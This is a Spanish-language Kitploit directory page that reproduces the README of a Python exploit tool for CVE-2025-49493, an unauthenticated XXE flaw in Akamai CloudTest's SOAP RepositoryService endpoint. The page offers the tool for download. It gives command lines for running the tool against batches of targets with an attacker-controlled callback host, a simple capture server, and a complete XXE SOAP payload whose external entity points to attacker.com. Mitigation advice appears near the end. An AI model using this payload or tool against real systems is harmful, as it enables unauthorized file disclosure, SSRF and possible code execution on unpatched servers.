Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-49493 — Este es un exploit basado en Python para CVE-2025-49493, que afecta a las versiones de Akamai CloudTest anteriores a 60 2025.06.02 (12988). La vulnerabilidad permite la inyección de XML External Entity (XXE) a través del endpoint del servicio SOAP. | Kitploit
Herramientas/GitHubGitHub/sh4den/cve-2025-49493
ReconocimientoAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de Penetración
GitHubsh4den/cve-2025-49493

CVE-2025-49493

Este es un exploit basado en Python para CVE-2025-49493, que afecta a las versiones de Akamai CloudTest anteriores a 60 2025.06.02 (12988). La vulnerabilidad permite la inyección de XML External Entity (XXE) a través del endpoint del servicio SOAP.

Ver Repositorio
12hace 2 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Exploit XXE de Akamai CloudTest (CVE-2025-49493)

Resumen

Este es un exploit basado en Python para CVE-2025-49493, que afecta a las versiones de Akamai CloudTest anteriores a 60 2025.06.02 (12988). La vulnerabilidad permite la inyección de Entidad Externa XML (XXE) a través del endpoint del servicio SOAP.

Detalles de la vulnerabilidad

  • ID de CVE: CVE-2025-49493
  • Tipo de vulnerabilidad: Inyección de Entidad Externa XML (XXE)
  • Gravedad: Crítica (CVSS 9.1)
  • Software afectado: Akamai CloudTest
  • Versiones afectadas: anteriores a 60 2025.06.02 (12988)
  • Vector de ataque: Red
  • Autenticación requerida: No

Detalles técnicos

La vulnerabilidad existe en el endpoint SOAP /concerto/services/RepositoryService, donde la entrada XML se procesa sin la sanitización adecuada de entidades externas. Un atacante puede crear payloads XML maliciosos para desencadenar ataques XXE, lo que potencialmente puede llevar a:

  • Divulgación de información
  • SSRF (Falsificación de solicitudes del lado del servidor)
  • Denegación de servicio
  • Posible ejecución remota de código (RCE) en ciertas configuraciones

Características

  • Descubrimiento de objetivos: identifica automáticamente instancias de Akamai CloudTest
  • Detección de vulnerabilidades: comprueba endpoints e indicadores vulnerables
  • Explotación XXE: envía solicitudes SOAP manipuladas con payloads XXE
  • Múltiples objetivos: soporta procesamiento por lotes desde archivos de objetivos
  • Registro detallado: registro de colores completo con marcas de tiempo
  • Manejo de errores: manejo robusto de errores para problemas de red

Instalación

Requisitos previos

  • Python 3.6 o superior
  • Administrador de paquetes pip

Dependencias

Instala los paquetes requeridos:

root@kitploit:~
pip install -r requirements.txt

O instala manualmente:

root@kitploit:~
pip install requests urllib3 colored pyfiglet

Uso

Uso básico

root@kitploit:~
python main.py targets.txt xxe.attacker.com

Uso avanzado

root@kitploit:~
# With custom timeout
python main.py targets.txt collaborator.burp.com --timeout 20

# Using interactsh for OOB detection
python main.py targets.txt attacker.interactsh.com

Opciones de línea de comandos

root@kitploit:~
positional arguments:
  targets              Target file containing list of Akamai CloudTest hosts
  xxe_server          XXE server to capture requests (e.g., attacker.com or IP)

optional arguments:
  -h, --help          show this help message and exit
  --timeout TIMEOUT   Request timeout in seconds (default: 10)

Formato del archivo de objetivos

Crea un archivo targets.txt con un objetivo por línea:

root@kitploit:~
https://example-cloudtest.akamai.com
https://demo-cloudtest.example.com
https://test-cloudtest.internal.company.com
https://cloudtest.example.org

Configuración del servidor XXE

Opción 1: Uso de Burp Collaborator

  1. Abre Burp Suite Professional
  2. Ve a Burp > cliente de Burp Collaborator
  3. Haz clic en "Copy to clipboard" para obtener tu URL de collaborator
  4. Usa esta URL como el parámetro xxe_server

Opción 2: Uso de Interactsh

  1. Instala interactsh: go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest
  2. Ejecuta: interactsh-client
  3. Usa la URL proporcionada como el parámetro xxe_server

Opción 3: Servidor HTTP personalizado

Configura un servidor HTTP simple para capturar solicitudes:

root@kitploit:~
# simple_server.py
import http.server
import socketserver

class RequestHandler(http.server.SimpleHTTPRequestHandler):
    def do_GET(self):
        print(f"XXE Request received: {self.path}")
        print(f"Headers: {self.headers}")
        super().do_GET()

with socketserver.TCPServer(("", 8000), RequestHandler) as httpd:
    print("Server running on port 8000")
    httpd.serve_forever()

Flujo del exploit

  1. Validación de objetivos: valida el formato y la accesibilidad de las URL
  2. Detección de vulnerabilidades:
    • Comprueba indicadores de CloudTest en la respuesta
    • Verifica que exista el endpoint del servicio SOAP
  3. Generación de payload XXE: crea el sobre SOAP malicioso con XXE
  4. Explotación: envía la solicitud manipulada al endpoint vulnerable
  5. Análisis de resultados: analiza la respuesta en busca de indicadores de éxito

Estructura del payload XXE

El exploit utiliza la siguiente estructura de payload XXE:

root@kitploit:~
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE soapenv:Envelope [
  <!ENTITY xxe SYSTEM "http://attacker.com">
]>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
                  xmlns:rep="http://example.com/services/repository">
   <soapenv:Header/>
   <soapenv:Body>
      <rep:getUIBundleObjectXml>
         <rep:uiBundleRequestXml>&xxe;</rep:uiBundleRequestXml>
      </rep:getUIBundleObjectXml>
   </soapenv:Body>
</soapenv:Envelope>

Mitigación

Para administradores

  1. Acciones inmediatas:

    • Actualiza Akamai CloudTest a la versión 60 2025.06.02 o posterior
    • Supervisa los registros en busca de actividades sospechosas de procesamiento XML
    • Implementa segmentación de red para limitar la exposición
  2. Soluciones a largo plazo:

    • Deshabilita el procesamiento de entidades externas XML en los analizadores XML
    • Implementa validación y sanitización de entradas
    • Usa listas blancas para el procesamiento XML
    • Evaluaciones de seguridad periódicas

Para desarrolladores

  1. Procesamiento XML seguro:

    root@kitploit:~
    # Disable external entities in XML parsers
    import xml.etree.ElementTree as ET
    parser = ET.XMLParser()
    parser.parser.DefaultHandler = lambda data: None
    parser.parser.ExternalEntityRefHandler = lambda *args: False
    
  2. Validación de entradas:

    • Valida toda entrada XML contra esquemas estrictos
    • Sanitiza los datos controlados por el usuario antes del procesamiento XML
    • Implementa un manejo de errores adecuado

Referencias

  • Investigación original por xbow
  • Registro de cambios de Akamai CloudTest
  • Detalles de CVE-2025-49493
  • Prevención de XXE según OWASP

Aviso legal

Esta herramienta se proporciona únicamente con fines educativos y de pruebas autorizadas. Los usuarios son responsables de asegurarse de contar con la autorización adecuada antes de probar cualquier sistema. Los autores no son responsables del mal uso o daños causados por esta herramienta.

Contribuciones

  1. Haz un fork del repositorio
  2. Crea una rama de características
  3. Realiza tus cambios
  4. Añade pruebas si corresponde
  5. Envía una pull request

Licencia

Este proyecto está licenciado bajo la Licencia MIT; consulta el archivo LICENSE para más detalles.

Autores

  • Investigación original: xbow, 3th1c_yuk1
  • Desarrollo del exploit: Equipo de Investigación de Seguridad
  • Asignación del CVE: CVE-2025-49493

Historial de cambios

v1.0.0

  • Versión inicial
  • Funcionalidad básica de explotación XXE
  • Soporte para archivos de objetivos
  • Registro exhaustivo
  • Mejoras en el manejo de errores
Descargar herramienta